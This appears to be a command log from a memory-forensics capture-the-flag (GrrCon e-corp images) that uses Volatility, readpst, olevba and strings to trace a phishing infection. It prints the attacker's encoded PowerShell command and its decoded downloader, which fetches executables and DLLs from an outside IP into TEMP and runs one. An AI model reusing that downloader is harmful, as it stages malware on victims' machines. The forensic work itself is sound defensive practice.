export VOLATILITY_LOCATION=file:///home/sansforensics/Desktop/GrrCon/ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem (разумеется, здесь будет Ваш путь до файла VOLATILITY_LOCATION=file://path)
export VOLATILITY_PROFILE=Win7SP1x64
vol.py pslist
vol.py getsids -p 1364
vol.py netscan
vol.py filescan | grep pst$
vol.py dumpfiles -n -i -r phillip.price@e-corp.biz.pst$ -D pst2
readpst -S file.2692.0xfffffa80042dcf10.phillip.price@e-corp.biz.pst.dat
olevba phillip.price@e-corp.biz/Inbox/13-bank_statement_088452.doс
powershell -ep bypass -nop -encodedCommand ZgBvAHIAZQBhAGMAaAAgACgAJABpACAAaQBuACAAQAAoACIAUwBrAHkAcABlAEMAMgBBAHUAdABvAFUAcABkAGEAdABlAC4AZQB4AGUAIgAsACIAVABlAGEAbQBWAGkAZQB3AGUAcgBfAEQAZQBzAGsAdABvAHAAL…<code snippet>…HYAOgBUAEUATQBQ
echo "ZgBvAHIAZQBhAGMAaAAgACgAJABpACAAaQBuACAAQAAoACIAUwBrAHkAcABlAEMAMgBBAHUAdABvAFUAcABkAGEAdABlAC4AZQB4AGUAIgAsACIAVABlAGEAbQBWAGkAZQB3AGUAcgBfAEQAZQBzAGsAdABvAHAAL…<code snippet>…HYAOgBUAEUATQBQ" | base64 -d
foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){
(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};
Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP
vol.py memdump -p 1364 -D .
strings -a 1364.dmp | grep -A4 "54.174.131.235"
string -el 1364.dmp | grep -A10 -B10 "54.174.131.235"
strings -a 1364.dmp | grep -A3 -B3 -E '([0-9]{1,3}\.[0-9]{1,3}\.)[0-9]{1,3}\.[0-9]{1,3}' | grep -A3 -B3 teamviewer
export VOLATILITY_LOCATION=file:///home/sansforensics/Desktop/GrrCon/ecorpwin7/ecorpwin7-e73257c4.vmem
vol.py netscan
vol.py filescan | grep pst$
vol.py dumpfiles -n -i -r Outlscott.knowles@e-corp.biz-00000004.pst$ -D .
readpst -S file.2496.0xfffffa80034e9850.Outlscott.knowles@e-corp.biz-00000004.pst.dat
vol.py filescan | grep rtf$
vol.py dumpfiles -Q 0x000000007d6b3850 -D .
sed 's/\x0//g' file.None.0xfffffa80040b3260.dat > Important_ECORP_Lawsuit_Washington_Leak.rtf
vol.py dumpfiles -n -i -r test.dll -D maldll
vol.py mftparser --output=body -D . --output-file=grrcon_mft.body
mactime -b grrcon_mft.body -d -z UTC | tail -1000f | egrep -v 'NULL' | egrep 'macb' | egrep '.rar|.zip|.7z|.gzip'
strings -el ecorpwin7-e73257c4.vmem | egrep -A5 -B5 'reports.rar'
strings -el ecorpwin7-e73257c4.vmem | egrep -A5 -B5 '.deb'